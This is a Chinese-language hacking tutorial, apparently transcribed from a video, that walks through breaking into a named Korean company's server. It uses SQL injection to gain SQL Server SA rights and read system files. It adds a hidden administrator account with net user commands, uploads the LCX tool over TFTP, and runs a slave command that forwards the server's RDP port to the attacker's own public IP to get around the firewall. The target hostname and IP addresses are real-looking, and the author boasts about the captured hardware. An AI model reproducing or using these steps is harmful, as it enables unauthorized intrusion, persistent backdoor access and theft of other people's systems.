这个是来源于一个动画吧
 
大家好!今天给大家讲一下入侵韩国服务器 我们首先从WEB入手
这个网站就是我们今天的目标 我们首先来看一下他用的是什么脚本程序 随便打开一个网页看看
View.asp 是ASP的!  既然是ASP我们首先应该想到的是注入 因为这个方法是通用的
用教主的这个工具来扫描一下  扫描结果已经出来了 接下来注入分析
SA 是系统权限的  SA表示SQL服务的最高权限 有了这个权限我们可以直接执行系统权限的命令 好
我们来到这个工具的高级命令这里  查看一下他的操作系统 type c:\boot.ini Windows 2000 Serve
然后我们看一下 他的IP地址221.141.2.19
   然后我们要判断一下这个SQL主机是不是和WEB主机在同一个服务器上 我们PING 一下网址 ping daewon.nth.co.kr  221.141.2.21
我们发现这个两个IP不一样 这就说明SQL服务器是独立的 那么我们要看一下他开没开3389终端服务
net start用这个命令查看   Terminal Services  已经开了  我们加一个用户上去
net user brucelu /add   这句是加一个BRUCELU的用户密码是空
net localgroup administrators brucelu /add   这句是把BRUCELU这个用户添加到管理员组
好!我们现在可以用远程桌面连接这个服务器拉 mstsc
连接不上 一般出现这种情况有两种原因
1.终端服务的断口改了 (这种情况的概率比较小)
2.我们的连接被防火墙拦截了下来(这种情况比较高)
我们首先应该考虑到第2种情况
突破防火墙 我们用LCX这个工具把对方的3389端口转发到我们自己的电脑上  有一个前提就是我们的计算机必须是公网 如果你用的是内网 请到陆游器上映射一下端口
好!我们用TFTP这个软件把 LCX这个工具传上去
就是这个命令 把这里改成你自己的IP  这个是本地的文件地址  这个是服务器的文件地址
我们刚才查看过了 他是2K的系统 所以系统目录是winnt的 这个文件名我们是随便命名的 在这里我就命了789 然后在服务器上执行一下这个命令
我门看到 我们的TFTP出现了进度条 这说明正在下载我们的工具  好 已经成功了
接下来我们用这个命令789.exe -slave 222.57.248.90 51 127.0.0.1 3389
还是在这里改成你的外网IP  后面不用改
然后我们在本地监视 返回的端口 在这里我选择了521端口
然后我们连接本机的IP  127.0.0.1:521
呵呵!我们已经成功的突破了防火墙了
2G内存 至强2.8的CPU  超级爽啊!
呵呵   教程到这里就结束了

您对本文章有什么意见或着疑问吗？请到论坛讨论您的关注和建议是我们前行的参考和动力